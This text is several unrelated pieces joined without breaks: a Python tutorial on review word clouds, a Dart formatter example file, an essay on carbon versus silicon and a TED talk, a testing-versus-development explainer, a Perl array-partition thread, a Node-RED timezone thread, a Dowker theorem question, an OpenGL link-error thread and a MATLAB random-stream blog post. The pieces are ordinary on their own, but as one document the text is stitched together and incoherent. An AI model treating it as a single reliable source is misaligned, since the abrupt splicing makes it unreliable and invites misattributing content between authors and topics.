Preprocessing
The extracted product reviews include unwanted characters like spaces, capital letters, symbols, smiley emojis. We don’t want to include those unwanted characters in text analysis, so in preprocessing we need to clean the data by removing unwanted characters.
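As a minimal illustration of this cleaning step (the sample review below is invented):

```python
import re

raw = "Great laptop!!! 10/10 :) SUPER fast..."
# Replace every run of non-letter characters with a single space, then lowercase
cleaned = re.sub("[^A-Za-z]+", " ", raw).lower().strip()
print(cleaned)  # great laptop super fast
```

Digits, punctuation, and emoticon characters all collapse into single spaces, leaving only lowercase words for the analysis.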
os.getcwd()
os.chdir("/content/chider")
# Joining all the reviews into a single paragraph
mac_rev_string = " ".join(macbook_reviews)

# Removing unwanted symbols in case any exist
mac_rev_string = re.sub("[^A-Za-z]+", " ", mac_rev_string).lower()
mac_rev_string = re.sub("[0-9]+", " ", mac_rev_string)

#here we split the reviews into individual words
mac_reviews_words = mac_rev_string.split(" ")
#removing the stop words
#stop_words = stopwords('english')
In the below code snippet, we will gather the words from the reviews and display them using a word cloud.
with open("/content/stop.txt", "r") as sw:
    stopwords = sw.read().split("\n")

# small illustration of filtering a list with a comprehension
temp = ["this", "is", "awsome", "Data", "Science"]
[i for i in temp if i not in ["is"]]

mac_reviews_words = [w for w in mac_reviews_words if w not in stopwords]
mac_rev_string = " ".join(mac_reviews_words)
#creating word cloud for all words
wordcloud_mac = WordCloud(
background_color='black',
width=1800,
height=1400
).generate(mac_rev_string)
plt.imshow(wordcloud_mac)
In the word cloud output, words like good, read, and laptop appear larger, which shows that these words are repeated more often in the MacBook Air reviews. We can see highlighted words like performance, battery, delivery, and laptop, but we cannot yet conclude how the battery works or how the laptop performs; to get those insights we need to split the output into positive and negative word clouds.
In the below code snippet we will extract Positive words from product reviews
with open("/content/positive-words.txt", "r") as pos:
    poswords = pos.read().split("\n")

poswords = poswords[36:]
mac_pos_in_pos = " ".join ([w for w in mac_reviews_words if w in poswords])
wordcloud_pos_in_pos = WordCloud(
background_color='black',
width=1800,
height=1400
).generate(mac_pos_in_pos)
plt.imshow(wordcloud_pos_in_pos)
#here we get wordcloud of all postive words in reviews
Flipkart review scraping
Through this positive word cloud, we get insights such as: the product is good, smooth, and fast; it is an awesome, beautiful product; it is portable; and buyers recommend it to others. These are the positive takeaways for the MacBook Air.
In the code snippet below, we extract the negative words from the product reviews.
with open("/content/negative-words.txt", "r", encoding="ISO-8859-1") as neg:
    negwords = neg.read().split("\n")
# Skip the header lines at the top of the lexicon file
negwords = negwords[37:]

# Negative word cloud
# Keep only the review words that appear in the negative-word list
mac_neg_in_neg = " ".join([w for w in mac_reviews_words if w in negwords])

wordcloud_neg_in_neg = WordCloud(
    background_color='black',
    width=1800,
    height=1400
).generate(mac_neg_in_neg)
plt.imshow(wordcloud_neg_in_neg)
# Word cloud of the most frequent negative words
Flipkart review scraping
Through this negative word cloud, we can see complaints such as: the product lags, it is slow, it crashed, there are issues with it, and it is too expensive.
Conclusion
By analyzing the product reviews with text mining, we gathered the most frequent positive and negative words using word clouds. We can conclude that text mining provides insight into customer sentiment and can help companies address problems. This technique offers an opportunity to improve the overall customer experience, which in turn pays off in profits.
// Copyright (c) 2015, the Dart project authors. Please see the AUTHORS file
// for details. All rights reserved. Use of this source code is governed by a
// BSD-style license that can be found in the LICENSE file.
library dart_style.example.format;

import 'dart:io';
import 'dart:mirrors';

import 'package:path/path.dart' as p;

import 'package:dart_style/dart_style.dart';
import 'package:dart_style/src/debug.dart' as debug;

void main(List<String> args) {
  // Enable debugging so you can see some of the formatter's internal state.
  // Normal users do not do this.
  debug.traceChunkBuilder = true;
  debug.traceLineWriter = true;
  debug.traceSplitter = true;
  debug.useAnsiColors = true;

  runTest("regression/0000/0068.stmt", 14);

  formatStmt("hello(world);");
}

void formatStmt(String source, [int pageWidth = 80]) {
  runFormatter(source, pageWidth, isCompilationUnit: false);
}

void formatUnit(String source, [int pageWidth = 80]) {
  runFormatter(source, pageWidth, isCompilationUnit: true);
}

void runFormatter(String source, int pageWidth, {bool isCompilationUnit}) {
  try {
    var formatter = new DartFormatter(pageWidth: pageWidth);

    var result;
    if (isCompilationUnit) {
      result = formatter.format(source);
    } else {
      result = formatter.formatStatement(source);
    }

    if (debug.useAnsiColors) {
      result = result.replaceAll(" ", debug.gray(debug.unicodeMidDot));
    }

    drawRuler("before", pageWidth);
    print(source);
    drawRuler("after", pageWidth);
    print(result);
  } on FormatterException catch (error) {
    print(error.message());
  }
}

void drawRuler(String label, int width) {
  var padding = " " * (width - label.length - 1);
  print("$label:$padding|");
}

/// Runs the formatter test starting on [line] at [path] inside the "test"
/// directory.
void runTest(String path, int line) {
  var indentPattern = new RegExp(r"^\(indent (\d+)\)\s*");

  // Locate the "test" directory. Use mirrors so that this works with the test
  // package, which loads this suite into an isolate.
  var testDir = p.join(
      p.dirname(currentMirrorSystem()
          .findLibrary(#dart_style.example.format)
          .uri
          .path),
      "../test");

  var lines = new File(p.join(testDir, path)).readAsLinesSync();

  // The first line may have a "|" to indicate the page width.
  var pageWidth = 80;
  if (lines[0].endsWith("|")) {
    pageWidth = lines[0].indexOf("|");
    lines = lines.skip(1).toList();
  }

  var i = 0;
  while (i < lines.length) {
    var description = lines[i++].replaceAll(">>>", "").trim();

    // Let the test specify a leading indentation. This is handy for
    // regression tests which often come from a chunk of nested code.
    var leadingIndent = 0;
    var indentMatch = indentPattern.firstMatch(description);
    if (indentMatch != null) {
      leadingIndent = int.parse(indentMatch[1]);
      description = description.substring(indentMatch.end);
    }

    if (description == "") {
      description = "line ${i + 1}";
    } else {
      description = "line ${i + 1}: $description";
    }

    var startLine = i + 1;
    var input = "";
    while (!lines[i].startsWith("<<<")) {
      input += lines[i++] + "\n";
    }

    var expectedOutput = "";
    while (++i < lines.length && !lines[i].startsWith(">>>")) {
      expectedOutput += lines[i] + "\n";
    }

    if (line != startLine) continue;

    var isCompilationUnit = p.extension(path) == ".unit";
    var inputCode =
        _extractSelection(input, isCompilationUnit: isCompilationUnit);
    var expected =
        _extractSelection(expectedOutput, isCompilationUnit: isCompilationUnit);

    var formatter =
        new DartFormatter(pageWidth: pageWidth, indent: leadingIndent);

    var actual = formatter.formatSource(inputCode);

    // The test files always put a newline at the end of the expectation.
    // Statements from the formatter (correctly) don't have that, so add
    // one to line up with the expected result.
    var actualText = actual.text;
    if (!isCompilationUnit) actualText += "\n";

    print("$path $description");
    drawRuler("before", pageWidth);
    print(input);
    if (actualText == expected.text) {
      drawRuler("result", pageWidth);
      print(actualText);
    } else {
      print("FAIL");
      drawRuler("expected", pageWidth);
      print(expected.text);
      drawRuler("actual", pageWidth);
      print(actualText);
    }
  }
}

/// Given a source string that contains ‹ and › to indicate a selection, returns
/// a [SourceCode] with the text (with the selection markers removed) and the
/// correct selection range.
SourceCode _extractSelection(String source, {bool isCompilationUnit: false}) {
  var start = source.indexOf("‹");
  source = source.replaceAll("‹", "");
  var end = source.indexOf("›");
  source = source.replaceAll("›", "");

  return new SourceCode(source,
      isCompilationUnit: isCompilationUnit,
      selectionStart: start == -1 ? null : start,
      selectionLength: end == -1 ? null : end - start);
}
Carbon vs Silicon
Are WE the dinosaurs of CARBON life as SILICON learns to take over?
Dr. Spock said “yes” in 1967 and Dr. Paul McCready said “yes” in 1998. Were they right?
Carbon vs Silicon
I confess, I never heard of Paul McCready until I decided to write this essay. I stumbled on him searching for a visual to complete this Twart on the existential war between Carbon and Silicon for dominance of earth.
What, you didn’t know a war was going on? Sure, Silicon is our friend right now; look at all it does for us carbon life forms. But friends can become enemies before we know it, especially friends that share many of the same desires like Carbon and Silicon do; they are mates who have been very close sexy cousins (see excerpt below) for billions of years. (They both apparently sleep around with a lot of other elements.)
[Tutorial Interruption, sorry; skip if your brain doesn't care.] "Carbon and Silicon both have a so-called valence of four--meaning that individual atoms make four bonds with other elements in forming chemical compounds. Each element bonds to oxygen. Each forms long chains, called polymers. In the simplest case, carbon yields a polymer that is a plastic used in synthetic fibers and equipment. Silicon yields polymeric silicones, which we use to waterproof cloth or lubricate metal and plastic parts. But when carbon oxidizes--or unites with oxygen say, during burning--it becomes the gas carbon dioxide; silicon oxidizes to the solid silicon dioxide, called silica [or sand], one basic reason why it cannot support life [as we know it]."
Star Trek was already suspicious of Silicon 31 years before McCready’s personal pronouncement, and that was 51 years ago now in 2018! But you say that was just science fiction, not reality. Really? It’s worth a second look since humanity has become steeped in silicon.
Star Trek explored the idea of a silicon life form in a 1967 TV episode The Devil in the Dark about an underground silicon monster named Horta that lived in tunnels. Horta looked like a huge hunk of hamburger that could shuffle along the ground–a laughable image for a monster. (Hmm …to shoot and kill it, or; to cook and eat it? What choice would Kirk and Spock make?)
Based on my compulsive crack research the word Horta probably came originally from the Biblical word “Hor” for mound or mountain, which later also came to mean pregnant. With only primitive special effects technology at the time, Star Trek’s wacky idea was converted into a thoughtful TV script and highly-rated timeless drama in just three days by famed writer and producer, Gene L. Coon, in the early days of TV. But I digress.
McCready’s TED Talk
Dr. Paul McCready was a deep-thinking problem solver, a much-celebrated innovative scientist and engineer, who was the first person to fulfill Leonardo da Vinci’s dream of a human flying under his own power. McCready was a first-rate technologist noted for finding innovative ways to do more with less based on his profound understanding of the awesome innovative power of nature. Experience his authentic big-picture wisdom in rare concurrent video-voice-text TED talk +my essay commentary.
He passed away in 2007 at the age of 81. In his 1998 TED Talk he summed up his view of how humanity and its technology fit in with the rest of the natural world. He spoke in an informal conversational tone without notes, along with a few key slides. His theme throughout was the growing power humans were amassing over nature, which was two decades before our current hyper-connected wireless silicon-based FrictionLessSociety (FLS).
As Dr. McCready got to the end of his talk, he paused as if asking his audience for their permission to let him read his conclusions, i.e., “to paint his version of the Big Picture.”
He began: “At last, I put in three sentences and had it say what I wanted.”
Dr. McCready reads: “Over billions of years on a unique sphere, chance has painted a thin covering of life — complex, improbable, wonderful and fragile. Suddenly, we humans — a recently arrived species, no longer subject to the checks and balances inherent in nature — have grown in population, technology and intelligence to a position of terrible power. We now wield the paintbrush. And that’s serious: We’re not very bright. We’re short on wisdom. We’re high on technology. Where’s it going to lead? There is no planet B.”
He continued talking informally now, almost imploring the audience to help answer his question.
“This is not a forecast. This is a warning, and we have to think seriously about it. And that time when this is happening is not 100 years or 500 years. Things are going on this decade, next decade; it’s a very short time that we have to decide what we are going to do. And if we can get some agreement on where we want the world to be — desirable, sustainable when your kids reach your age — I think we actually can reach it.
(Is this why kids today seem so angry with prior generations, for not having dealt with the negative consequences of what we created?)
McCready closed his formal remarks with this sobering thought
“…Maybe this is a forecast, after all…I personally think the surviving intelligent life form on earth is not going to be carbon-based; it’s going to be silicon-based.”
And then, with a sheepish grin, he delighted his audience and lifted their spirits “with one final bit of sparkle” by giving a live autonomous flight demonstration over the audience’s heads of an “utterly impractical flight vehicle, a little ornithopter wing-flapping rubber-band powered device that weighed one gram.”
It got stuck in the rafters like a mechanical moth fluttering its wings against the roof, going nowhere. Everyone laughed.
Living in a Blur of Bits
Dr. McCready did not use the phrase “Blur of Bits” nor Frictionless Society (FLS) to describe the future as he saw it from twenty years ago, but he might have. This is what it looks like to me.
Based on his talk, he was prescient in his warning, and perhaps even in his forecast as well, because “Silicon” arguably has a “life of its own” in billions of Carbon Lives today. It pervades every aspect of society as data-being-processed:
Who you are, what you value, where you are, what you are doing, how you are doing, what and when you plan to do it, and why.
CEO Ginni Rometty stated in her opening remarks at IBM’s February Think Conference that “only 20% of the world’s data is currently searchable,” implying that the other 80% is available for economic growth by all kinds of businesses large and small. IBM’s plan? Everyone will use Watson’s AI to monetize this data to solve problems for society (and move IBM back to its rightful place at the top of the Silicon Palace).
“Watson took a year to figure out its first cancer; now it takes one month. It gets smarter and smarter. Programming a computer is dead; deep AI learning with data is the future.” (Reminds me of the hammer-and-nail view of reality.)
The existential problematique of the FLS is that data, as information, is a complex chameleon of abstract potential. In physical form it is a liquid lizard that can change shape, color, size, dynamics, and merge seamlessly with other information to produce endless variety. It’s the digital genie in the bottle we have let loose without thinking carefully about what wishes we want to be granted, which are turning out to be endless!
Is this what Carbon wants, or what Silicon wants?
From #ChaunceySays Twitter Commentary @viewshift1:
1. If humans are JUST data…
2…humans can be any THING they can compute.
3. Does this mean we are just EQUATIONS, and LIFE is just a PROBLEM to be solved?
The language of people is WORDS & we are all the editors. The language of data is MATH. The math of life is DNA data. The editor of LIFE is CRISPR. Who edits it?
Testing vs Development
Software testing and software development are two distinct terms in computing. They are two different and important stages in the life of a software program because they perform different functions that support the existence and efficiency of a program. It is important to define each of these terms and identify the various roles they play.
Software testing
Software testing is the process of confirming the correctness, quality, and completeness of computer software. It involves carrying out specific activities designed to spot errors in a software program so that they can be corrected before the program is released and distributed to the end users.
Testing helps developers check whether the actual result corresponds with the expected result, and whether the software is free of errors. How is this done?
To test software, it is operated under controlled conditions to see whether the output is the expected output, to study the behavior of the program, to look for errors, and to check whether the software will meet the needs of the user.
For instance, if a program is designed to process the payroll of a company, during testing, the various stages of processing of payroll will be tested on the program. Different parameters may be tested in the program to ensure that it functions in all the areas where it is expected to be used by the end user. The program may fail or show some flaws such as inaccurate calculation or omission of some data, factors that can have serious effects on the output of the program. When this occurs, the program will be taken back to the software programmer to correct all the errors. That is the essence of software testing.
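The payroll scenario above can be sketched as a tiny automated check. A minimal illustration, with the caveat that the function name, the overtime rule, and the figures are all hypothetical, chosen purely to show expected-versus-actual testing:

```python
# Hypothetical payroll function: gross pay with time-and-a-half overtime
# past 40 hours. The rule and rates are made up for illustration.
def gross_pay(hours, hourly_rate):
    if hours < 0 or hourly_rate < 0:
        raise ValueError("hours and hourly_rate must be non-negative")
    regular = min(hours, 40) * hourly_rate
    overtime = max(hours - 40, 0) * hourly_rate * 1.5
    return regular + overtime

# Expected vs. actual: the heart of software testing
assert gross_pay(40, 10) == 400   # no overtime
assert gross_pay(45, 10) == 475   # 5 overtime hours at 15/hr
```

If a later change to the program breaks the overtime calculation, the second assertion fails immediately, which is exactly the kind of inaccurate-calculation flaw testing is meant to catch before release.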
Software development
While software testing involves analyzing a software program to determine its efficiency and errors, in addition to evaluating some of its features, software development refers to how the software program is created. It is simply the process of writing computer code and maintaining it. In a broad sense, software development involves all the developmental stages of the software, from the conception of the idea to the launch of the program.
While software development may sound simple, the process may involve extensive research, prototyping, re-engineering, developing an extensive algorithm, drawing a flowchart, several modifications, coding for hundreds of hours, debugging both serious and minor errors, and other processes that contribute to the existence of the software program. Software development is also called application development, enterprise application development, designing software, platform development, and the like.
This brings out the difference between the two terms. Software development refers to all the processes that culminate in the existence of a software program, while software testing means checking that software to find areas of improvement, detect potential errors, verify its accuracy, and carry out any other activities that ensure the successful launch of error-free software. Testing is a way of finding out whether a program functions in conformity with the objectives set while it was under development.
Software programs are developed by software developers, who are also called programmers, while a program can be tested by a software tester, test lead, test administrator, test designer, automation tester, or test manager.
Although testing is not part of development itself, it serves as a guide to the developers, showing them what can go wrong and keeping their efforts from being wasted.
In essence, software development precedes software testing. Without developed software, there is nothing to be tested. On the other hand, without well-tested software, a program is nothing.
More References / Tutorials
|
__label__pos
| 0.830302 |
Re^2: partition of an array
by rir (Vicar)
on Apr 22, 2009 at 04:19 UTC
in reply to Re: partition of an array
in thread partition of an array
For the universe of positive integers, I sensed a simple solution lurking. I found one, but I didn't like how it coded up: it just pushes the largest remaining number onto a half; if that number is forced onto the currently smaller half, it goes into a "protest" queue in that half. When ready to add a number to the other half while a protest is pending, you instead pop the top of the queue over to the other half. This works and is fairly efficient, but the control code is messy.
Today, it just struck me that you don't have to keep the halves balanced (abs(@left - @right) <= 1) as you create them; just make sure enough numbers remain to fill the other half.
use List::Util qw{ sum };

sub L() { 0 }    # left
sub R() { 1 }    # right

sub remainder_halves {
    my $in = shift;
    my $ar;
    @$ar = sort { $b <=> $a } @$in;
    die "bounds error" if @$ar && $$ar[-1] < 0;
    my @ans = ( [], [] );    # halves for answer
    no warnings 'uninitialized';    # summing empty arrays
    my ( $targ, $other ) = ( L, R );
    my ($halfsize) = int( ( @$ar + 1 ) / 2 );
    while (@$ar) {
        while ( sum( @{ $ans[$targ] } ) <= sum( @{ $ans[$other] } )
            && @{ $ans[$targ] } < $halfsize )
        {
            push @{ $ans[$targ] }, shift @$ar;
        }
        ( $targ, $other ) = ( $other, $targ );
        push @{ $ans[$targ] }, shift @$ar if @{ $ans[$targ] } < $halfsize;
    }
    my $score = abs( sum( @{ $ans[L] } ) - sum( @{ $ans[R] } ) );
    return $score, $ans[L], $ans[R];
}
Be well,
rir
Re^3: partition of an array
by BrowserUk (Pope) on Apr 23, 2009 at 03:30 UTC
No, neither of us should do that. :-) I should have just left well enough alone with my brute-force solution.
I tested my "quick" version with every data set in this thread and more; and managed to miss sequences like: 550, 450, 360, 340, 300. Oh well, I'll be more perspicacious tomorrow. Ha!
Be well,
rir
Timezone settings?
Hi,
I have a function which includes a line similar to this
new Date(1530215497000) (The epoch datestamp used here is an example)
and although the server on which Node-RED runs is set to the correct timezone, it is not respected and (since I’m in GMT+2) the result is consistently 2 hours off.
What am I missing here or what else can I do to fix this?
cheers
If you set the payload to that and pass it to a debug node what does it show and what do you expect it to show?
Please copy/paste the complete string it shows or paste a screenshot.
What server are you running on?
What version of node-red?
What version of nodejs?
Thanks!
It shows this 2018-06-29T08:57:30.000Z for new Date(1530262650000) and I would like it to say the correct time (as the Chrome console does when I run that same command) -> Fri Jun 29 2018 10:57:30 GMT+0200
Running on ARMBIAN 5.38 stable Debian, latest Node-RED, and Node.js v8.11.3
This might help https://www.digitalocean.com/community/tutorials/understanding-date-and-time-in-javascript
What do you get from new Date()?
Those two times are identical. The Z means it is showing it in UTC, the GMT+0200 means it is showing it in that timezone. It is just a matter of how you choose to display it, they are both the same time. If you want to display it on the dashboard (or elsewhere) in a particular or local timezone then you can use the Moment node to format it as you wish.
what does the command
dpkg-reconfigure tzdata
return?
A configuration utility. Set to Europe, Amsterdam.
Thanks. So Node-Red provides no local timezone functionalities itself then?
That is interesting, I would have expected the debug node output to display in local time of, I think, the server, but perhaps it is the browser. Are you running the browser on the same machine as node-red?
You can find more timezones here:
https://en.wikipedia.org/wiki/List_of_tz_database_time_zones
Let $R \subset X \times Y$ be any relation between sets $X$ and $Y$. CH Dowker constructed two simplicial complexes $K$ and $L$ associated to $R$:
1. a simplex in $K$ consists of finitely many elements $x \in X$ such that there exists a single $y \in Y$ with $(x,y) \in R$, and
2. a simplex in $L$ consists of finitely many elements $y \in Y$ such that there exists a single $x \in X$ with $(x,y) \in R$.
Clearly, these are simplicial complexes. The main theorem of Dowker is the construction of a natural isomorphism of homology groups of $K$ and $L$. There is even a proof outline on nlab. In fact there is a homotopy equivalence between the geometric realizations although that requires an ordering on the simplices and is therefore not natural. This may be found in the paper
C. H. Dowker, Homology Groups of Relations, Annals of Math, 56, (1952), 84–95.
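To make the two complexes concrete, here is a small illustrative sketch (not from Dowker's paper): for a finite relation, the maximal simplices of $K$ are the fibers over each $y \in Y$, and those of $L$ are the fibers over each $x \in X$. The toy relation below is made up for illustration.

```python
# Toy relation R ⊂ X × Y, chosen for illustration only.
R = {("a", 1), ("b", 1), ("b", 2), ("c", 2)}

def dowker_maximal_simplices(R, flip=False):
    """Maximal simplices of Dowker's complex K (or L when flip=True)."""
    fibers = {}
    for x, y in R:
        if flip:
            x, y = y, x
        fibers.setdefault(y, set()).add(x)  # all elements related to a common witness
    return [frozenset(s) for s in fibers.values()]

K = dowker_maximal_simplices(R)             # on X: {a, b} and {b, c}
L = dowker_maximal_simplices(R, flip=True)  # on Y: {1}, {1, 2}, {2}
```

Here both geometric realizations deform to a path (the two edges of $K$ share the vertex $b$, and $L$ is a single edge), so their homology groups agree, consistent with Dowker's theorem.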
The goal of this paper was to prove equivalence of Cech, Vietoris and Alexander (co)homology theories. My question is
What other applications (if any) have been found for this theorem?
In particular, the fact that the relation itself creates the simplicial complexes seems to make this theorem have very limited uses beyond the consequences proved already by Dowker: I can't seem to find much on the internet at least. I wonder if the experts have some idea...
1 Answer
There is a considerable literature on `applications' of Dowker's result to sociology. This is sometimes doubtful in its depth! The development was started by R. Atkin.
As an example look at
http://www.ehu.es/ccwintco/uploads/1/11/Blanca-Cases-Q-analysis.pdf
As an offshoot of this there is fairly recent work in discrete maths (see work by Hélène Barcelo). I will not try to describe this other than saying it looks at an idea of the connectivity of a relation.
Back in the world of algebraic topology, it provides a way of proving that the pro-object in the homotopy category of simplicial sets, that is given by the Cech complex construction is in fact homotopy coherent. This provides a way of linking strong shape theory to the original form of shape theory. (It is not hard to prove this coherence directly although I only know one proof that has been written down in a thesis of one of my ex-students.)
(Edit: I forgot another example. You start with a group, $G$, and a family of subgroups, and ask to what extent invariants of the family give you invariants of the big group. This was the subject of a paper by Abels and Holz (Higher generation by subgroups, J. Algebra, 160 (1993), 311–341). The family generates a covering of $G$ by its cosets. The two complexes given by that covering allow proofs to be shortened and also, in certain circumstances, for links to Volodin's algebraic K-theory to be given.)
LINK error
I’m doing an OpenGL game and i can’t compile my code because of a linkage error i’m getting.
The code compiled many times before and worked flawlessly, but I modified some stuff, and now it's just that one link error.
“supfile.obj : error LNK2001 : unresolved external symbol _auxDIBImageLoadA@4”
I use a function called "auxDIBImageLoad(LPCTSTR)" and it used to work just fine. This function is declared in <gl\glaux.h>, which I include in this file.
Someone please tell me what is wrong.
of course you also imported glaux.lib (or whatever its name is) in your project, didn’t you?
BTW, AUX is notoriously outdated and unsupported. I would recommend you to use something else to handle image loading.
I did include glaux.lib, and it still doesn't work. If I were not to use that function at all, what function is there to load a bitmap and detect the size automatically?
I just need something to load a bitmap without having to define its size myself (I'm using it as a texture).
are you mixing C and C++ in some way? name decoration could prevent the linker from finding the function in the lib.
you could try DevIL (www.imagelib.org), or simply write your bmp loader and image resizing routine.
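If you go the roll-your-own route, reading the image dimensions out of the BMP header is straightforward. A minimal sketch, with the caveat that this is not the AUX library: the offsets come from the standard Windows BITMAPFILEHEADER/BITMAPINFOHEADER layout (the 14-byte file header followed by the info header), and it assumes a little-endian machine.

```cpp
#include <cstdint>
#include <cstring>

struct BmpSize {
    int32_t width;
    int32_t height;
};

// Extract biWidth/biHeight from an in-memory BMP file image.
// BITMAPFILEHEADER is 14 bytes, so biWidth sits at byte offset 18
// and biHeight at offset 22 of the file.
BmpSize readBmpSize(const unsigned char* fileData) {
    BmpSize s;
    std::memcpy(&s.width,  fileData + 18, 4);
    std::memcpy(&s.height, fileData + 22, 4);
    return s;
}
```

With the size known, you can allocate the pixel buffer yourself and hand it to glTexImage2D, instead of relying on the unsupported AUX helpers.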
Loren on the Art of MATLAB
Turn ideas into MATLAB
New Ways With Random Numbers, Part II
Once again we're going to hear from guest blogger Peter Perkins, who is a statistical software developer here at The MathWorks.
Contents
Last time, I showed a few ways to reproduce the values coming from MATLAB's random number generators. But sometimes what's needed is the "opposite of reproducibility" - you want to make sure that different runs of a simulation use different random inputs, because you want to be able to assume that the different runs are statistically independent. That's today's subject.
Using Seeds to Get Different Results
Remember seeds from my last post? I talked about reproducibility. If you create a random number stream with the same seed, you'll get the same sequence of values every time. But just as important, if you create different streams using different seeds, you'll get different sequences.
When MATLAB starts, it creates the default stream with commands equivalent to
stream0 = RandStream('mt19937ar','Seed',0)
stream0 =
mt19937ar random stream
Seed: 0
RandnAlg: Ziggurat
We saw that last week. To get a different sequence of random values, I can create a new stream with a different seed, such as
stream1 = RandStream('mt19937ar','Seed',1)
stream1 =
mt19937ar random stream
Seed: 1
RandnAlg: Ziggurat
Next I'll make it the default stream.
RandStream.setDefaultStream(stream1);
By setting stream1 as the default stream, I've made it so that rand, randn, and randi will use that stream from now on, and will draw values from a different sequence than they did when using stream0. Just to confirm that I've changed the default stream,
stream1 == RandStream.getDefaultStream()
ans =
1
In practice, I might have created the new stream on a second processor, to run in parallel with the first, or created it in a second MATLAB session on the same processor. It doesn't matter, either way works the same.
One common use of seeds is to get different random values each time you start up MATLAB without having to think about it every time. To do that, you can base the seed on the system clock.
mystream = RandStream('mt19937ar','Seed',sum(100*clock))
mystream =
mt19937ar random stream
Seed: 210226
RandnAlg: Ziggurat
RandStream.setDefaultStream(mystream);
Bear in mind that you won't be able to reproduce your results later on unless you hang onto the value of sum(100*clock). Doh!
You might wonder what value you should use for a seed, and whether you will somehow add "extra randomness" into MATLAB by using the system clock. The answer is, you won't. In fact, taking this strategy to the extreme and reseeding a generator before each call will very likely do bad things to the statistical properties of the sequence of values you end up with. There's nothing wrong with choosing widely-spaced seeds, but there's no real advantage.
Remember, seeding a stream is not something you want to do a lot of. It's most useful if you use it as an initialization step, perhaps at MATLAB startup, perhaps before running a simulation.
Using Multiple Independent Streams
A reasonable question to ask at this point is, "If you can't tell me how far apart or what in order the different seeds are in the sequence of random values, how do I know that two simulation runs won't end up reusing the same random values?" The answer is, "You don't." Practically speaking, the state space of the Mersenne Twister used in the example above is so ridiculously much larger (2^19937 elements) than the number of possible seeds (2^32) that the chances of overlap in different simulation runs are pretty remote unless you use a large number of different seeds. But there is a more subtle potential problem - not enough is known about the statistical (pseudo)independence of sequences of values corresponding to different "seeds" of the Mersenne Twister generator.
There is a better way available in MATLAB R2008b: two new generator algorithms support multiple independent streams. That is, you can create separate streams that are guaranteed to not overlap, and for which tests that demonstrate (pseudo)independence of the values not only within each stream, but between streams, have been carried out. Notably, the Mersenne Twister ('mt19937ar') does not support multiple streams.
The two generator types that support multiple independent streams are the Combined Multiple Recursive ('mrg32k3a') and the Multiplicative Lagged Fibonacci ('mlfg6331_64') generators (the doc has references.) I'll create one of the former, and make it the default stream.
cmrg1 = RandStream.create('mrg32k3a','NumStreams',2,'StreamIndices',1);
RandStream.setDefaultStream(cmrg1)
The first parameter, NumStreams, says how many independent streams I plan on using, in total. StreamIndices says which one (or which ones) I actually want to create right now. Note that I've used the RandStream.create factory method, which allows for creating multiple streams as a group, and that the display for this stream
cmrg1
cmrg1 =
mrg32k3a random stream (current default)
StreamIndex: 1
NumStreams: 2
Seed: 0
RandnAlg: Ziggurat
indicates that it is part of a larger group (even though I have not yet created the second stream).
Let's say I've made one run of a simulation using the above as the default stream, represented by these 100,000 random values.
x1 = rand(100000,1);
Now I want to make a second, independent simulation run. If the runs are short enough, I might just run one after another in the same MATLAB session, without modifying the state of the default stream between runs. Since successive values coming from a stream are statistically independent, there's nothing at all wrong with that. On the other hand, if I want to shut down MATLAB between runs, or I want to run on two machines in parallel, that isn't going to work.
What I can do, though, is to create the second of my two independent streams, and make it the default stream.
cmrg2 = RandStream.create('mrg32k3a','NumStreams',2,'StreamIndices',2)
RandStream.setDefaultStream(cmrg2)
x2 = rand(100000,1);
cmrg2 =
mrg32k3a random stream
StreamIndex: 2
NumStreams: 2
Seed: 0
RandnAlg: Ziggurat
Let's look at the correlation between the two streams.
corrcoef(x1,x2)
ans =
1 0.0015578
0.0015578 1
That isn't by any means proof of statistical independence, but it is reassuring. In fact, much more thorough tests have been used to demonstrate between-stream independence of these generators.
As long as the streams are created correctly, it doesn't matter where or when I make the second simulation run, the results will still be independent from the first run. 'mrg32k3a' and 'mlfg6331_64' both support a huge number of parallel independent streams, and each stream is itself very, very long, so you can use multiple independent streams for very large simulations.
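As a sketch of how this scales out (the loop and variable names here are mine, not from the post), each of N runs can create just its own member of an N-stream 'mrg32k3a' group and draw from it directly, leaving the default stream untouched:

```matlab
% Hypothetical sketch: N independent simulation runs, e.g. on N machines.
nRuns = 4;
results = cell(nRuns,1);
for k = 1:nRuns
    % Create only stream k of an nRuns-stream group.
    s = RandStream.create('mrg32k3a','NumStreams',nRuns,'StreamIndices',k);
    % Draw from the stream explicitly instead of making it the default.
    results{k} = rand(s,100000,1);
end
```

In practice each iteration would live in its own MATLAB session or on its own machine; because the streams are created as members of the same group, the draws are independent either way.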
Using Substreams to Get Different Results
Remember substreams from my last post? I promised to explain why they're different from seeds, so here it is. Unlike seeds, which land who-knows-where and who-knows-how-far-apart along the sequence of random numbers, the spacing between substreams is known, so any chance of overlap can be eliminated. And as with independent parallel streams, research has been done to demonstrate statistical independence across substreams. In short, they are a more controlled way to do many of the same things that seeds have traditionally been used for, and a more lightweight solution than parallel streams.
Substreams provide a quick and easy way to ensure that you get different results from the same code at different times. For example, if I run this loop (from the last post)
defaultStream = RandStream.getDefaultStream();
for i = 1:5
defaultStream.Substream = i;
z = rand(1,i)
end
z =
0.32457
z =
0.25369 0.3805
z =
0.22759 0.34154 0.61441
z =
0.0054898 0.12139 0.70173 0.15851
z =
0.51784 0.37283 0.54639 0.14839 0.89321
and then run off to Tahiti, and then come back (maybe), I can run this loop
for i = 6:10
defaultStream.Substream = i;
z = rand(1,11-i)
end
z =
0.48889 0.46817 0.62735 0.14538 0.84446
z =
0.66568 0.11152 0.035575 0.013499
z =
0.60589 0.28911 0.74664
z =
0.24981 0.78979
z =
0.25271
and be certain that I've generated random values independently of the first set of 5 iterations, and in fact have gotten exactly the same results as if I had never gone to Tahiti (though not gotten as good a tan):
for i = 1:10
defaultStream.Substream = i;
z = rand(1,min(i,11-i));
end
As always, I might run the second loop at a different time than the first, but on the same machine, or run it at the same time on a different machine. As long as the stream is set up correctly, it makes no difference.
Being a Good Random Citizen of MATLAB Nation
It's important to remember that replacing the default stream, or changing its state (whether by resetting it, by setting its state directly, or by positioning it to a new substream), affects all subsequent calls to rand, randn, and randi, and is something you should be careful about doing. If code you write is used by someone else who has no idea that you've done one of those things, your code may unintentionally invalidate the results of their simulation by affecting the statistical properties of the random numbers they use, or make it difficult for them to reproduce their results when they need to.
In general, I recommend leaving control of the default stream up to the end user as much as possible. If you are your own end user, it might be a good idea to execute "stream control" statements only at MATLAB startup, or only right before running a simulation.
